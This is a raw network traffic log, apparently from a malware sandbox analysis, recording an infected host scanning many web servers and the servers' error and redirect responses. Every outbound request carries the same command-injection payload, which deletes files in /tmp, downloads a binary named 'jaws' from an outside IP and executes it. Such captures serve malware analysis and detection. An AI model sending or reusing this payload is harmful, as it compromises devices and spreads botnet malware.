                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            473192.168.2.2333268190.102.101.20380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.469183922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.589966059 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            474192.168.2.2353818174.141.213.15280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.539246082 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            475192.168.2.233813223.15.47.8380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.552407026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.986206055 CET428INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 206
                                                            Expires: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 31 37 37 39 34 35 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 38 26 23 34 36 3b 34 61 31 64 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;f1779452&#46;1706279548&#46;4a1dd</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            476192.168.2.234761669.192.228.13080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.904791117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:29.178088903 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:29 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:29 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 63 30 32 65 35 63 61 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 39 26 23 34 36 3b 31 38 30 66 37 36 39 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;dc02e5ca&#46;1706279549&#46;180f769a</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            477192.168.2.2345732103.69.193.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:29.071265936 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:29.409236908 CET434INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 26 Jan 2024 14:32:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            478192.168.2.2358528184.94.157.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.542967081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.661106110 CET416INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Server: Apache
                                                            Content-Length: 203
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            479192.168.2.234682067.225.246.16480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.553241014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.681732893 CET466INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.3.33
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            480192.168.2.2338674107.142.58.6380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.553653002 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            481192.168.2.234748238.177.201.880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.581667900 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            482192.168.2.2345170110.88.128.18580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.780797005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.129687071 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:50 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            483192.168.2.235970823.201.134.2280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.795973063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.166779995 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 65 32 31 30 66 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 35 30 26 23 34 36 3b 37 63 33 32 33 38 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ae210f17&#46;1706279550&#46;7c32381</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            484192.168.2.2356236176.56.236.5880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.860397100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.060609102 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 65 6c 65 6b 6f 2e 65 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at deleko.es Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            485192.168.2.235993423.202.252.17480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.867096901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.073288918 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 33 37 33 32 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 35 30 26 23 34 36 3b 34 35 64 64 31 64 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2f373217&#46;1706279550&#46;45dd1da</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            486192.168.2.233418294.137.77.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:30.876888037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.092689037 CET219INHTTP/1.1 400 Bad request
                                                            Content-length: 90
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            487192.168.2.233474265.1.219.12180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:31.046646118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:31.354273081 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            488192.168.2.233419894.137.77.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:31.309111118 CET219INHTTP/1.1 400 Bad request
                                                            Content-length: 90
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            489192.168.2.2357276149.62.39.12580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.482018948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.592540979 CET932INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            server: LiteSpeed
